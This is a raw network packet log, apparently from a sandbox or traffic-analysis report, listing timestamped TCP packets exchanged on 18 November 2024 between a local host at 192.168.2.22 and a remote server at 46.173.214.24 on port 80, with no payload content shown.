                                                                                                                                                  Nov 18, 2024 18:22:43.179476023 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.179491043 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.179507971 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.179542065 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.179574966 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.179651022 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.179666042 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.179709911 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.179807901 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.179956913 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.179970026 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.180094004 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.180116892 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.180130005 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.180155993 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.184582949 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.184624910 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.184638023 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.184659958 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.184684038 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.184686899 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.184696913 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.184737921 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.197531939 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.260776997 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.260796070 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.260818005 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.260828972 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.260839939 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.260843039 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.260880947 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.261168957 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.261181116 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.261193991 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.261205912 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.261229992 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.261281967 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.261295080 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.261329889 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.302706957 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.302752018 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.302768946 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.302784920 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.302799940 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.302803040 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.302819014 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.311599016 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.347335100 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.347361088 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.347369909 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.347421885 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.379448891 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.379475117 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.379491091 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.379524946 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.379570961 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.379585981 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.379596949 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.379606009 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.379621983 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.380109072 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.380125046 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.380141973 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.380147934 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.380187035 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.420945883 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.420975924 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.420991898 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.421008110 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.421015024 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.421046019 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.421082020 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.467041016 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.467070103 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.467087030 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.467088938 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.468039989 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.497883081 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.497916937 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.497932911 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.497958899 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.497997046 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.498013973 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.498033047 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.498223066 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.498239040 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.498260021 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.498291016 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.498306036 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.498322964 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.498327017 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.498356104 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.511425018 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.511441946 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.511480093 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.539479971 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.539520979 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.539540052 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.539555073 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.539580107 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.539586067 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.539597034 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.539613008 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.539650917 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.585643053 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.585673094 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.585699081 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.585716009 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.616175890 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.616225958 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.616256952 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.616272926 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.616309881 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.616344929 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.616362095 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.616403103 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.616590977 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.616606951 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.616624117 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.616641998 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.616667986 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.616683960 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.616703987 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.657916069 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.657944918 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.657958984 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.657962084 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.658000946 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.658072948 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.658090115 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.658104897 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.658122063 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.658123970 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.658159971 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.658175945 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.704008102 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.704036951 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.704051971 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.704090118 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.706437111 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.722033024 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.733639956 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.734671116 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.734688997 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.734705925 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.734729052 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.734755993 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.734772921 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.734791040 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.734955072 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.734998941 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.735027075 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.735043049 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.735059023 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.735075951 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.776943922 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.776963949 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.776992083 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.777026892 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.777041912 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.777070045 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.777118921 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.777137995 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.777159929 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.777544022 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.777600050 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.777795076 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.822664022 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.822686911 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.822705984 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.822725058 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.822743893 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.853419065 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.853445053 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.853477001 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.853492975 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.853508949 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.853523016 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.853538036 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.853538990 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.853549004 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.853555918 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.853557110 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.853574991 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.853602886 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.853645086 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.853818893 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.853847027 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.853863955 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.853888035 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.895065069 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.895107985 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.895124912 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.895138025 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.895164967 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.895201921 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.895220041 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.895252943 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.895458937 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.895559072 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.895574093 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.895596981 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.938383102 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.938400030 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.938523054 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.941174984 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.941216946 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.941241980 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.941258907 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.941293955 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.971446991 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.971479893 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.971517086 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.971546888 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.971570969 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.971604109 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.971621037 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.972289085 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.972343922 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.972359896 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.972364902 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.972402096 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.972423077 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.972481966 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.972496986 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:43.972522974 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:43.984690905 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.013417006 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.013489008 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.013504982 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.013535976 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.014513969 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.014560938 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.014576912 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.014600039 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.014641047 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.014647007 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.014664888 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.014710903 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.025398970 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.059640884 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.059674025 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.059689999 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.059717894 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.059751034 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.059767008 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.059787989 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.090255022 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.090286970 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.090301991 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.090358019 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.090379953 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.090759993 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.090814114 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.090830088 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.090854883 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.090888023 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.090903997 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.090929031 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.091131926 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.091176033 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.091207027 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.091223001 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.091267109 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.131926060 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.131963015 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.131978035 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.132005930 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.133874893 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.133924007 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.134038925 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.134129047 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.134150028 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.134166002 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.134166956 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.134202003 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.192400932 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.192436934 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.192454100 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.192486048 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.192526102 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.192542076 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.192568064 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.208868027 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.208888054 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.208904028 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.208933115 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.209161997 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.209204912 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.209225893 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.209242105 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.209279060 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.209347963 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.209364891 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.209403992 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.209645033 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.209659100 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.209702015 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.209800005 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.209918976 CET804917546.173.214.24192.168.2.22
                                                                                                                                                  Nov 18, 2024 18:22:44.209961891 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.220643997 CET4917580192.168.2.2246.173.214.24
                                                                                                                                                  Nov 18, 2024 18:22:44.220911026 CET4917580192.168.2.2246.173.214.24
